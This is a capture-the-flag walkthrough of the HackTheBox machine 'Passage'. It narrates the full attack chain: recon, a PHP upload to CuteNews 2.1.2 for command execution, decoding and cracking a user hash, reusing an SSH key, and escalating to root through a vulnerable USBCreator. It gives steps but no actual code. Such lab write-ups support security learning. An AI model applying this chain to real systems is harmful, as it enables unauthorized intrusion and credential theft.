Passage Passage

Passage from HackTheBox is medium, fun but straightforward machine, it starts with two open ports SSH on 22 and HTTP on 80, we find CuteNews (which is a free, powerful and easy-to-use news management system based on flat files as a storage with quick installation, search function) it has an upload vulnerability that gives us a shell on the box and from there we hunt for some credentials for user paul who shares private ssh key with the user nadav, finaly we find vulnerable version of the program USBCreator installed that we use it for privilege escalation to root

Summary

Recon

Nmap

Nmap full TCP scan shows us two open ports 80 for HTTP and 22 for SSH.

nmap full tcp scan nmap full tcp scan
We run nmap targeted scan with default scripts flag -sC and version enummiration flag -sV against port 22,80, from apache version we can guess this is ubuntu Xenial.
nmap targeted scan nmap targeted scan

Port 80

We check port 80 and we find what looks like blog posts titled Passage News.

checking port 80 checking port 80
Looking at the source code of the page reveals an e-mail address nadav@passage.htb
source code of the page at port 80 source code of the page at port 80
Clicking on CuteNews/rss.php takes us to another page source that tells us that ip address of this machine is associated with domain http//passage.htb.
CuteNews/rss.php source CuteNews/rss.php source
Adding passage.htb to /etc/hosts.
adding passage.htb to /etc/hosts adding passage.htb to /etc/hosts

Registering a user

Checking website more took us to http://passage.htb/CuteNews which is a login/registration system for CuteNews. Note: the version of CuteNews is revealed to be 2.1.2.

http://passage.htb/CuteNews http://passage.htb/CuteNews
Let’s register a user to see what we get.
registering a user registering a user
After registering it logs us to dashboard.
dashboard dashboard

User shell

Uploading a shell (manual)

By clicking on personal options we are taken to our profile infos, looks normal but what if we try to upload php file instead of picture in avatar option? (uploads options usually vulnerable).

personal options of the user personal options of the user
We create and uplaod a simple php file p-shell.php to get command execution on the server.
uploading php file uploading php file
Looks like the php file was uploaded successfully.
php file uploaded successfully php file uploaded successfully
To know where our php file was uploaded we right click on avatar option and copy image location
copy image location copy image location
We try to execute whoami and we get a response back!
whoami command executed whoami command executed

User shell (automated)

That was the manual method but someone created a script to exploit CuteNews 2.1.2 automaticly on exploit-db.

automatic exploit script automatic exploit script
We execute the script with python (version 3) and give it ip address of our website or domain name and it drops a shell automaticly for us and interesting note is it droped hashes to crack for users as well.
shell with automatic script shell with automatic script
We continue our recon after obtaining a shell to find interesting php files in /var/www/html/CuteNews/cdata/users that contain base64 encoded hashes for users.
interesting php files interesting php files

Finding hashes

After inspecting all php files we hit jackpot with b0.php.

b0.php b0.php
We decode the base64 encoding to find a hash for the user paul.
decode base64 encoding decode base64 encoding
We try to crack that hash online https://crackstation.net/ and we get password:atlanta1.
cracking hash cracking hash

Su as paul

We su as paul and we get in.

su as paul su as paul
After a little investigating the home directory of paul we find .ssh directory it has private key, how about we try it maybe paul and nadav shared the key to login as nadav.
finding .ssh directory finding .ssh directory

Login as nadav

Trying the private key to login as nadav.

login as nadav login as nadav

Root shell

Now let’s use linpeas.sh to try to find a way to escalate to root.

getting linpeas.sh getting linpeas.sh
Interestingly enough linpeas.sh found a vulnerable version of USBCreator installed on the system.
a vulnerable version of USBCreator a vulnerable version of USBCreator
With a little google search we find an article that explains the vulnerability and how to exploit it.
article of the vulnerability article of the vulnerability
After replicating the steps in the article we can obtain private key of the root user and use it to login.
root shell root shell
Thank you for reading, and I hope this article was enjoyable and helpful.